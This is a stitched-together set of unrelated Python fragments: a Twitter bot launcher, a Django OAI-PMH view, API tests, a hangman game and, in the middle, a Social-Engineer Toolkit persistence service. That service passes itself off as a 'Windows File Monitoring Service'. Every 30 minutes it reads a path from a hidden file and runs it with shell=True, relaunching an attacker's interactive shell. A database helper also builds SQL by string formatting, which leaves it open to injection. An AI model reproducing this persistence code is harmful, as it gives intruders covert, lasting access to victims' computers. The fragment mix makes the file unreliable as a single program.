] | [((887, 921), 'attrs.define', 'attrs.define', ([], {'eq': '(False)', 'repr': '(False)'}), '(eq=False, repr=False)\n', (899, 921), False, 'import attrs\n'), ((1248, 1273), 'attrs.field', 'attrs.field', ([], {'factory': 'dict'}), '(factory=dict)\n', (1259, 1273), False, 'import attrs\n'), ((2735, 2780), 'databutler.pat.astlib.get_definitions_and_accesses', 'astlib.get_definitions_and_accesses', (['code_ast'], {}), '(code_ast)\n', (2770, 2780), False, 'from databutler.pat import astlib\n'), ((4172, 4217), 'databutler.pat.astlib.get_definitions_and_accesses', 'astlib.get_definitions_and_accesses', (['code_ast'], {}), '(code_ast)\n', (4207, 4217), False, 'from databutler.pat import astlib\n'), ((6083, 6147), 'databutler.pat.astlib.with_deep_replacements', 'astlib.with_deep_replacements', (['target', 'repl_dict', 'output_mapping'], {}), '(target, repl_dict, output_mapping)\n', (6112, 6147), False, 'from databutler.pat import astlib\n'), ((8908, 8997), 'databutler.pat.astlib.with_deep_replacements', 'astlib.with_deep_replacements', (['target', '{**df_repl_map, **series_repl_map}', 'output_map'], {}), '(target, {**df_repl_map, **series_repl_map},\n output_map)\n', (8937, 8997), False, 'from databutler.pat import astlib\n'), ((9413, 9432), 'databutler.pat.astlib.walk', 'astlib.walk', (['target'], {}), '(target)\n', (9424, 9432), False, 'from databutler.pat import astlib\n'), ((12833, 12862), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (12856, 12862), False, 'import collections\n'), ((14698, 14727), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (14721, 14727), False, 'import collections\n'), ((15482, 15527), 'os.path.join', 'os.path.join', (['script_dir', 'f""".mypy_cache{uid}"""'], {}), "(script_dir, f'.mypy_cache{uid}')\n", (15494, 15527), False, 'import os\n'), ((4369, 4401), 'databutler.pat.astlib.iter_body_stmts', 'astlib.iter_body_stmts', (['code_ast'], {}), '(code_ast)\n', (4391, 4401), False, 'from databutler.pat import astlib\n'), ((4585, 4617), 'databutler.pat.astlib.iter_body_stmts', 'astlib.iter_body_stmts', (['code_ast'], {}), '(code_ast)\n', (4607, 4617), False, 'from databutler.pat import astlib\n'), ((4640, 4657), 'databutler.pat.astlib.walk', 'astlib.walk', (['stmt'], {}), '(stmt)\n', (4651, 4657), False, 'from databutler.pat import astlib\n'), ((5192, 5236), 'databutler.pat.astlib.is_constant', 'astlib.is_constant', (['cur.enclosing_node.value'], {}), '(cur.enclosing_node.value)\n', (5210, 5236), False, 'from databutler.pat import astlib\n'), ((10431, 10494), 'databutler.pat.astlib.with_deep_replacements', 'astlib.with_deep_replacements', (['target', 'repl_map', 'output_mapping'], {}), '(target, repl_map, output_mapping)\n', (10460, 10494), False, 'from databutler.pat import astlib\n'), ((12242, 12305), 'databutler.pat.astlib.with_deep_replacements', 'astlib.with_deep_replacements', (['target', 'repl_map', 'output_mapping'], {}), '(target, repl_map, output_mapping)\n', (12271, 12305), False, 'from databutler.pat import astlib\n'), ((12982, 13006), 'databutler.pat.astlib.is_constant', 'astlib.is_constant', (['node'], {}), '(node)\n', (13000, 13006), False, 'from databutler.pat import astlib\n'), ((15210, 15257), 'databutler.pat.astlib.with_deep_replacements', 'astlib.with_deep_replacements', (['target', 'repl_map'], {}), '(target, repl_map)\n', (15239, 15257), False, 'from databutler.pat import astlib\n'), ((15444, 15469), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (15459, 15469), False, 'import os\n'), ((15666, 15691), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (15681, 15691), False, 'import os\n'), ((15714, 15754), 'os.path.join', 'os.path.join', (['script_dir', '""".mypy_cache*"""'], {}), "(script_dir, '.mypy_cache*')\n", (15726, 15754), False, 'import os\n'), ((5256, 5307), 'databutler.pat.astlib.get_constant_value', 'astlib.get_constant_value', (['cur.enclosing_node.value'], {}), '(cur.enclosing_node.value)\n', (5281, 5307), False, 'from databutler.pat import astlib\n'), ((13053, 13084), 'databutler.pat.astlib.get_constant_value', 'astlib.get_constant_value', (['node'], {}), '(node)\n', (13078, 13084), False, 'from databutler.pat import astlib\n'), ((14868, 14888), 'databutler.pat.astlib.to_code', 'astlib.to_code', (['expr'], {}), '(expr)\n', (14882, 14888), False, 'from databutler.pat import astlib\n'), ((1488, 1501), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (1499, 1501), False, 'import io\n'), ((6024, 6043), 'databutler.pat.astlib.walk', 'astlib.walk', (['target'], {}), '(target)\n', (6035, 6043), False, 'from databutler.pat import astlib\n'), ((3355, 3381), 'databutler.pat.astlib.to_code', 'astlib.to_code', (['alias.name'], {}), '(alias.name)\n', (3369, 3381), False, 'from databutler.pat import astlib\n'), ((12036, 12084), 'databutler.pat.astlib.parse_expr', 'astlib.parse_expr', (['f"""dummy["{expr.attr.value}"]"""'], {}), '(f\'dummy["{expr.attr.value}"]\')\n', (12053, 12084), False, 'from databutler.pat import astlib\n'), ((3174, 3216), 'databutler.pat.astlib.to_code', 'astlib.to_code', (['def_.enclosing_node.module'], {}), '(def_.enclosing_node.module)\n', (3188, 3216), False, 'from databutler.pat import astlib\n'), ((3545, 3578), 'databutler.pat.astlib.to_code', 'astlib.to_code', (['alias.asname.name'], {}), '(alias.asname.name)\n', (3559, 3578), False, 'from databutler.pat import astlib\n')] |
## @package bot
# Module that sets up the Geometrize Twitter bot.
#
# Invoke this script to run the bot i.e. "python bot.py".
import sys
import config
import dependency_locator
import geometrize
import geometrize_bot
import launch_text
import on_status_event
import tweepy
# Print welcome text.
launch_text.print_launch_text()
# Check that secrets/app credentials have been filled out.
if not config.validate_credentials():
print("Failed to validate app credentials, will exit. Did you remember to enter them in config.py?")
sys.exit(1)
# Check that the Geometrize executable is where we expect it to be.
if not dependency_locator.geometrize_executable_exists():
print("Failed to locate the Geometrize executable, will exit. Did you copy it to the 'geometrize' subdirectory? Expected it to be here: " + dependency_locator.get_geometrize_executable_path())
sys.exit(2)
# Run a quick test script to confirm Geometrize is in working order.
print("Running startup tests to ensure Geometrize is working...\r\n")
if geometrize.test_geometrize():
print("Geometrize startup tests succeeded!\r\n")
else:
print("Geometrize startup tests failed. Please report an issue here: https://github.com/Tw1ddle/geometrize-twitter-bot \r\n")
sys.exit(3)
# Connect to Twitter.
tweepy_auth = tweepy.OAuthHandler(config.OAUTH_CONSUMER_KEY, config.OAUTH_CONSUMER_SECRET)
tweepy_auth.set_access_token(config.OAUTH_ACCESS_TOKEN, config.OAUTH_ACCESS_SECRET)
tweepy_api = tweepy.API(tweepy_auth)
## Callback triggered when the stream listener connects.
def on_connect(api):
print("Twitter stream listener did connect")
## Callback triggered when the stream listener times out.
def on_timeout(api):
print("Twitter stream listener did time out")
return False
## Callback triggered when the listener encounters an error.
def on_error(api, code):
print("Encountered Twitter error response: %s" % code)
return True
## Callback triggered when the stream listener for the Geometrize bot account reports a status event.
def on_on_demand_status_event(api, status):
print("Received Twitter stream listener status event")
on_status_event.on_on_demand_status_event(api, status)
## Callback triggered when the stream listener for tracking specific Twitter accounts reports a status event.
def on_account_watcher_status_event(api, status):
print("Received Twitter stream listener status event")
on_status_event.on_account_watcher_status_event(api, status)
## Callback triggered when setting up the stream filter for tracking the Geometrize bot account.
def on_on_demand_filter_setup(stream):
print("Setting up on demand tweet filter...")
stream.filter(track = [config.TWITTER_BOT_USERNAME], is_async = True)
## Callback triggered when setting up the stream filter for tracking specific Twitter accounts.
def on_account_watcher_filter_setup(stream):
print("Setting up account watcher tweet filter...")
stream.filter(follow = config.TWITTER_BOT_WATCH_ACCOUNTS, is_async = True)
# Create and set up the on-demand Geometrize bot.
# This bot waits for users to tweet images at the bot, which it then geometrizes.
on_demand_bot = geometrize_bot.GeometrizeBot(
tweepy_auth,
tweepy_api,
on_connect,
on_timeout,
on_error,
on_on_demand_status_event,
on_on_demand_filter_setup)
# Create and set up the specific account watcher bot.
# This bot watches specific accounts and geometrizes images they tweet.
account_watcher_bot = geometrize_bot.GeometrizeBot(
tweepy_auth,
tweepy_api,
on_connect,
on_timeout,
on_error,
on_account_watcher_status_event,
on_account_watcher_filter_setup)
| [
"geometrize.test_geometrize",
"tweepy.API",
"config.validate_credentials",
"on_status_event.on_on_demand_status_event",
"dependency_locator.get_geometrize_executable_path",
"launch_text.print_launch_text",
"sys.exit",
"on_status_event.on_account_watcher_status_event",
"dependency_locator.geometrize_executable_exists",
"tweepy.OAuthHandler",
"geometrize_bot.GeometrizeBot"
] | [((300, 331), 'launch_text.print_launch_text', 'launch_text.print_launch_text', ([], {}), '()\n', (329, 331), False, 'import launch_text\n'), ((1034, 1062), 'geometrize.test_geometrize', 'geometrize.test_geometrize', ([], {}), '()\n', (1060, 1062), False, 'import geometrize\n'), ((1306, 1382), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', (['config.OAUTH_CONSUMER_KEY', 'config.OAUTH_CONSUMER_SECRET'], {}), '(config.OAUTH_CONSUMER_KEY, config.OAUTH_CONSUMER_SECRET)\n', (1325, 1382), False, 'import tweepy\n'), ((1480, 1503), 'tweepy.API', 'tweepy.API', (['tweepy_auth'], {}), '(tweepy_auth)\n', (1490, 1503), False, 'import tweepy\n'), ((3178, 3323), 'geometrize_bot.GeometrizeBot', 'geometrize_bot.GeometrizeBot', (['tweepy_auth', 'tweepy_api', 'on_connect', 'on_timeout', 'on_error', 'on_on_demand_status_event', 'on_on_demand_filter_setup'], {}), '(tweepy_auth, tweepy_api, on_connect,\n on_timeout, on_error, on_on_demand_status_event, on_on_demand_filter_setup)\n', (3206, 3323), False, 'import geometrize_bot\n'), ((3498, 3659), 'geometrize_bot.GeometrizeBot', 'geometrize_bot.GeometrizeBot', (['tweepy_auth', 'tweepy_api', 'on_connect', 'on_timeout', 'on_error', 'on_account_watcher_status_event', 'on_account_watcher_filter_setup'], {}), '(tweepy_auth, tweepy_api, on_connect,\n on_timeout, on_error, on_account_watcher_status_event,\n on_account_watcher_filter_setup)\n', (3526, 3659), False, 'import geometrize_bot\n'), ((399, 428), 'config.validate_credentials', 'config.validate_credentials', ([], {}), '()\n', (426, 428), False, 'import config\n'), ((539, 550), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (547, 550), False, 'import sys\n'), ((627, 676), 'dependency_locator.geometrize_executable_exists', 'dependency_locator.geometrize_executable_exists', ([], {}), '()\n', (674, 676), False, 'import dependency_locator\n'), ((879, 890), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (887, 890), False, 'import sys\n'), ((1257, 1268), 'sys.exit', 'sys.exit', (['(3)'], {}), '(3)\n', (1265, 1268), False, 'import sys\n'), ((2151, 2205), 'on_status_event.on_on_demand_status_event', 'on_status_event.on_on_demand_status_event', (['api', 'status'], {}), '(api, status)\n', (2192, 2205), False, 'import on_status_event\n'), ((2430, 2490), 'on_status_event.on_account_watcher_status_event', 'on_status_event.on_account_watcher_status_event', (['api', 'status'], {}), '(api, status)\n', (2477, 2490), False, 'import on_status_event\n'), ((822, 873), 'dependency_locator.get_geometrize_executable_path', 'dependency_locator.get_geometrize_executable_path', ([], {}), '()\n', (871, 873), False, 'import dependency_locator\n')] |
from django.views.generic.base import View
from django.template.response import HttpResponse
from share.oaipmh.repository import OAIRepository
class OAIPMHView(View):
CONTENT_TYPE = 'text/xml'
def get(self, request):
return self.oai_response(**request.GET)
def post(self, request):
return self.oai_response(**request.POST)
def oai_response(self, **kwargs):
repository = OAIRepository()
xml = repository.handle_request(self.request, kwargs)
return HttpResponse(xml, content_type=self.CONTENT_TYPE)
| [
"share.oaipmh.repository.OAIRepository",
"django.template.response.HttpResponse"
] | [((416, 431), 'share.oaipmh.repository.OAIRepository', 'OAIRepository', ([], {}), '()\n', (429, 431), False, 'from share.oaipmh.repository import OAIRepository\n'), ((509, 558), 'django.template.response.HttpResponse', 'HttpResponse', (['xml'], {'content_type': 'self.CONTENT_TYPE'}), '(xml, content_type=self.CONTENT_TYPE)\n', (521, 558), False, 'from django.template.response import HttpResponse\n')] |
import pandas as pd
import psycopg2
#from sqlalchemy import create_engine
psql_credeintal = {
'database': 'wode',
'user': 'wode',
'password': '***',
'host': '192.168.3.11',
'port': '5432'
}
con = psycopg2.connect(**psql_credeintal)
def get_winrate(user_id):
query = "SELECT position, winrate FROM positions WHERE user_id='%s' order by position" % user_id
query_results = pd.read_sql_query(query,con)
return query_results
get_winrate(119807644)
| [
"pandas.read_sql_query",
"psycopg2.connect"
] | [((241, 276), 'psycopg2.connect', 'psycopg2.connect', ([], {}), '(**psql_credeintal)\n', (257, 276), False, 'import psycopg2\n'), ((425, 454), 'pandas.read_sql_query', 'pd.read_sql_query', (['query', 'con'], {}), '(query, con)\n', (442, 454), True, 'import pandas as pd\n')] |
from django.core.files.base import ContentFile
import base64
import uuid
def get_report_image(data):
_, image_binary = data.split(';base64')
decoded_image = base64.b64decode(image_binary)
img_name = str(uuid.uuid4())[:10] + '.png'
data = ContentFile(decoded_image, name=img_name)
return data
| [
"uuid.uuid4",
"base64.b64decode",
"django.core.files.base.ContentFile"
] | [((168, 198), 'base64.b64decode', 'base64.b64decode', (['image_binary'], {}), '(image_binary)\n', (184, 198), False, 'import base64\n'), ((257, 298), 'django.core.files.base.ContentFile', 'ContentFile', (['decoded_image'], {'name': 'img_name'}), '(decoded_image, name=img_name)\n', (268, 298), False, 'from django.core.files.base import ContentFile\n'), ((218, 230), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (228, 230), False, 'import uuid\n')] |
#!/usr/bin/python
#
##########################################################################
#
# Social-Engineer Toolkit Persistence Service
#
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# really a good idea, but it's a start.
#
##########################################################################
#
# ex usage: persistence.exe install, start, stop, remove
#
# You can see output of this program running python site-packages\win32\lib\win32traceutil for debugging
#
##########################################################################
import win32service
import win32serviceutil
import win32event
import win32evtlogutil
import win32traceutil
import servicemanager
import winerror
import time
import sys
import os
import subprocess
class aservice(win32serviceutil.ServiceFramework):
_svc_name_ = "windows_monitoring"
_svc_display_name_ = "Windows File Monitoring Service"
_svc_deps_ = ["EventLog"]
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
self.isAlive = True
def SvcStop(self):
# tell Service Manager we are trying to stop (required)
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
# set the event to call
win32event.SetEvent(self.hWaitStop)
self.isAlive = False
def SvcDoRun(self):
import servicemanager
# wait for beeing stopped ...
self.timeout = 1000 # In milliseconds (update every second)
while self.isAlive:
# wait for service stop signal, if timeout, loop again
rc = win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
# expand the filesystem path
windir = os.environ['WINDIR']
# grab homepath
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
# pull the windows operating system version number
windows_version = sys.getwindowsversion()[2]
# pull integer of version number
windows_version = int(windows_version)
# windows XP and below
if windows_version < 3791:
fileopen = open("%s\\system32\\isjxwqjs" % (windir), "r")
# windows 7, vista, 2008, etc. that might have UAC so we write to
# AppData instead
if windows_version > 3791:
fileopen = open("%s\\isjxwqjs" % (homedir_path), "r")
for line in fileopen:
# pull set-path, this is pulled from interactive shell and
# written when persistence is called
set_path = line.rstrip()
# specify filename to execute the SET interactive shell
subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# sleep 30 mins
time.sleep(1800)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
return
if __name__ == '__main__':
# f its called with arguments then run
if len(sys.argv) == 1:
try:
evtsrc_dll = os.path.abspath(servicemanager.__file__)
servicemanager.PrepareToHostSingle(aservice)
servicemanager.Initialize('aservice', evtsrc_dll)
servicemanager.StartServiceCtrlDispatcher()
except win32service.error as details:
if details[0] == winerror.ERROR_FAILED_SERVICE_CONTROLLER_CONNECT:
win32serviceutil.usage()
else:
win32serviceutil.HandleCommandLine(aservice)
| [
"win32serviceutil.HandleCommandLine",
"subprocess.Popen",
"os.path.abspath",
"sys.getwindowsversion",
"servicemanager.StartServiceCtrlDispatcher",
"win32event.SetEvent",
"time.sleep",
"win32event.WaitForSingleObject",
"servicemanager.PrepareToHostSingle",
"win32event.CreateEvent",
"servicemanager.Initialize",
"win32serviceutil.usage",
"win32serviceutil.ServiceFramework.__init__",
"os.getenv"
] | [((1068, 1122), 'win32serviceutil.ServiceFramework.__init__', 'win32serviceutil.ServiceFramework.__init__', (['self', 'args'], {}), '(self, args)\n', (1110, 1122), False, 'import win32serviceutil\n'), ((1148, 1188), 'win32event.CreateEvent', 'win32event.CreateEvent', (['None', '(0)', '(0)', 'None'], {}), '(None, 0, 0, None)\n', (1170, 1188), False, 'import win32event\n'), ((1413, 1448), 'win32event.SetEvent', 'win32event.SetEvent', (['self.hWaitStop'], {}), '(self.hWaitStop)\n', (1432, 1448), False, 'import win32event\n'), ((3740, 3784), 'win32serviceutil.HandleCommandLine', 'win32serviceutil.HandleCommandLine', (['aservice'], {}), '(aservice)\n', (3774, 3784), False, 'import win32serviceutil\n'), ((1752, 1812), 'win32event.WaitForSingleObject', 'win32event.WaitForSingleObject', (['self.hWaitStop', 'self.timeout'], {}), '(self.hWaitStop, self.timeout)\n', (1782, 1812), False, 'import win32event\n'), ((1951, 1975), 'os.getenv', 'os.getenv', (['"""SystemDrive"""'], {}), "('SystemDrive')\n", (1960, 1975), False, 'import os\n'), ((2916, 3036), 'subprocess.Popen', 'subprocess.Popen', (["('%s' % set_path)"], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'stdin': 'subprocess.PIPE'}), "('%s' % set_path, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n", (2932, 3036), False, 'import subprocess\n'), ((3104, 3120), 'time.sleep', 'time.sleep', (['(1800)'], {}), '(1800)\n', (3114, 3120), False, 'import time\n'), ((3340, 3380), 'os.path.abspath', 'os.path.abspath', (['servicemanager.__file__'], {}), '(servicemanager.__file__)\n', (3355, 3380), False, 'import os\n'), ((3393, 3437), 'servicemanager.PrepareToHostSingle', 'servicemanager.PrepareToHostSingle', (['aservice'], {}), '(aservice)\n', (3427, 3437), False, 'import servicemanager\n'), ((3450, 3499), 'servicemanager.Initialize', 'servicemanager.Initialize', (['"""aservice"""', 'evtsrc_dll'], {}), "('aservice', evtsrc_dll)\n", (3475, 3499), False, 'import servicemanager\n'), ((3512, 3555), 'servicemanager.StartServiceCtrlDispatcher', 'servicemanager.StartServiceCtrlDispatcher', ([], {}), '()\n', (3553, 3555), False, 'import servicemanager\n'), ((2145, 2168), 'sys.getwindowsversion', 'sys.getwindowsversion', ([], {}), '()\n', (2166, 2168), False, 'import sys\n'), ((3697, 3721), 'win32serviceutil.usage', 'win32serviceutil.usage', ([], {}), '()\n', (3719, 3721), False, 'import win32serviceutil\n')] |
import requests
from model.json_check import *
from model.input_data import *
# Запрос на получение настроек всех объектов CAM
def test_GetV1AllCamerasCode200():
data = "success"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["status"]
assert data == n
def test_GetV1AllCamerasStatus401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
# Запрос на получение настроек объекта CAM
def test_GetV1CamerasByIdCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId, auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CamerasByIdCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId, auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CamerasByIdCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
#Запрос на получение поля status объекта CAM
def test_GetV1CameraStatusCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/status", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraStatusCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/status", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraStatusCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/status", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Запрос на получение поля rtsp объекта CAM
def test_GetV1CameraRtspCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Запрос на получение поля rtsp/live объекта CAM
def test_GetV1CameraRtspLiveCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/live", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspLiveCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/live", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspLiveCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp/live", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Запрос на получение поля rtsp/archive объекта CAM
def test_GetV1CameraRtspArchiveCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/archive", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspArchiveCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/archive", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspArchiveCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp/archive", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
| [
"requests.get"
] | [((200, 291), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/',\n auth=auth)\n", (212, 291), False, 'import requests\n'), ((528, 623), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/')", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/',\n auth=('', ''))\n", (540, 623), False, 'import requests\n'), ((790, 889), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId)", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId, auth=auth)\n", (802, 889), False, 'import requests\n'), ((1128, 1231), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId)", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId, auth=('', ''))\n", (1140, 1231), False, 'import requests\n'), ((1383, 1475), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/0')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort +\n '/api/v1/cameras/0', auth=auth)\n", (1395, 1475), False, 'import requests\n'), ((1758, 1869), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId + '/status'\n )", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/status', auth=auth)\n", (1770, 1869), False, 'import requests\n'), ((2107, 2222), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId + '/status'\n )", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/status', auth=('', ''))\n", (2119, 2222), False, 'import requests\n'), ((2374, 2473), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/0/status')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort +\n '/api/v1/cameras/0/status', auth=auth)\n", (2386, 2473), False, 'import requests\n'), ((2753, 2862), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId + '/rtsp')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp', auth=auth)\n", (2765, 2862), False, 'import requests\n'), ((3098, 3211), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId + '/rtsp')", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp', auth=('', ''))\n", (3110, 3211), False, 'import requests\n'), ((3360, 3457), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/0/rtsp')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort +\n '/api/v1/cameras/0/rtsp', auth=auth)\n", (3372, 3457), False, 'import requests\n'), ((3746, 3860), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId +\n '/rtsp/live')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp/live', auth=auth)\n", (3758, 3860), False, 'import requests\n'), ((4100, 4218), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId +\n '/rtsp/live')", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp/live', auth=('', ''))\n", (4112, 4218), False, 'import requests\n'), ((4371, 4473), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/0/rtsp/live')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort +\n '/api/v1/cameras/0/rtsp/live', auth=auth)\n", (4383, 4473), False, 'import requests\n'), ((4768, 4885), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId +\n '/rtsp/archive')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp/archive', auth=auth)\n", (4780, 4885), False, 'import requests\n'), ((5128, 5249), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId +\n '/rtsp/archive')", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp/archive', auth=('', ''))\n", (5140, 5249), False, 'import requests\n'), ((5405, 5510), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/0/rtsp/archive')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort +\n '/api/v1/cameras/0/rtsp/archive', auth=auth)\n", (5417, 5510), False, 'import requests\n')] |
import random
from impiccato_disegno import d_impiccato, logo
from parole_impiccato import lista_parole
scelta_parola = random.choice(lista_parole)
print(logo)
game_over = False
energia = len(d_impiccato)-1
campo_gioco = []
for i in scelta_parola:
campo_gioco += '_'
while not game_over:
indovina = input('Indovina la lettera: ')
for posizione in range(len(scelta_parola)):
lettera = scelta_parola[posizione]
if lettera == indovina:
campo_gioco[posizione] = lettera
print(f"{' '.join(campo_gioco)}")
if indovina not in scelta_parola:
print(f"Hai tentato con la lettera {indovina}, non è la lettera corretta. Hai perso una vita.")
energia -= 1
if energia == 0:
game_over = True
print(f"Hai perso! La parola corretta era {scelta_parola}")
if not '_' in campo_gioco:
game_over = True
